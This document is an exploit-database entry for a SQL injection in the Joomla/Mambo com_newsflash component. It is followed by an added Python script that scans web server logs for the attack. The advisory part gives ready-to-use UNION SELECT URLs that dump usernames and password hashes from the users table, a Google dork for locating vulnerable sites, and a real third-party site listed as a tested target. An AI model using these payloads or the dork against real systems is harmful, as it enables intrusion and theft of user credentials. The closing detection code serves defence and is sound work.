Joomla com_newsflash (id) Remote SQL Injection Vulnerability

2009-01-11T00:00:00
ID 1337DAY-ID-4629
Type zdt
Reporter EcHoLL
Modified 2009-01-11T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
============================================================
Joomla com_newsflash (id) Remote SQL Injection Vulnerability
============================================================


#Joomla newsflash Sql injection#
########################################
#[~] Author : EcHoLL
#[!] Module_Name:  newsflash
#[!] Script_Name: mambo and joomla
#[!] Google_Dork: inurl:"com_newsflash"
########################################
sqlcode:index.php?option=com_newsflash&id=8+and+1=1+union+select+1,username,password,4+from+mos_users&catid=0
 
mambo target: www.webpage.com/index.php?option=com_newsflash&id=8+and+1=1+union+select+1,username,password,4+from+mos_users&catid=0
 
joomla target: www.webpage.com/index.php?option=com_newsflash&id=8+and+1=1+union+select+1,username,password,4+from+jos_users&catid=0
 
 
tested page
http://www.flairsoft.net/main/index.php?option=com_newsflash&id=8+and+1=1+union+select+1,username,password,4+from+mos_users&catid=0



#  0day.today [2016-04-20]  #
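For defenders, the requests above stand out in web server logs because the id parameter of com_newsflash carries text instead of a plain integer. The following is an added example, not part of the original advisory or of any Joomla/Mambo code: it scans access-log lines for that pattern, assuming the combined log format; the function names and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Tokens typical of the UNION-based payload shown in the advisory.
SQL_TOKENS = re.compile(r'\b(union|select|from|(?:mos|jos)_users)\b', re.I)

def check_request(target):
    """Return a reason string if the request puts a non-integer value into
    com_newsflash's id parameter, else None. (Hypothetical helper.)"""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if "com_newsflash" not in query.get("option", []):
        return None
    for value in query.get("id", []):
        # parse_qs has already decoded '+' and %xx, so encoded variants match too.
        if not re.fullmatch(r"[0-9]+", value):
            tokens = sorted({t.lower() for t in SQL_TOKENS.findall(value)})
            return "non-numeric id" + (f" with SQL tokens {tokens}" if tokens else "")
    return None

def scan(lines):
    """Yield (client_ip, reason) for every suspicious log line."""
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        reason = check_request(m.group(1))
        if reason:
            yield line.split(" ", 1)[0], reason

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [11/Jan/2009:10:00:01 +0000] "GET /index.php?option=com_newsflash&id=8&catid=0 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [11/Jan/2009:10:00:05 +0000] "GET /index.php?option=com_newsflash&id=8+and+1=1+union+select+1,username,password,4+from+jos_users&catid=0 HTTP/1.1" 200 6231',
    '203.0.113.9 - - [11/Jan/2009:10:00:09 +0000] "GET /index.php?option=com_newsflash&id=8%20UNION%20SELECT%201 HTTP/1.1" 200 4100',
    '198.51.100.7 - - [11/Jan/2009:10:00:12 +0000] "GET /index.php?option=com_content&id=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, reason in scan(SAMPLE_LOG):
        print(ip, reason)
```

The integer-only rule is the primary signal; the SQL token list only enriches the alert and should not be relied on alone, since keyword filters are easy to evade.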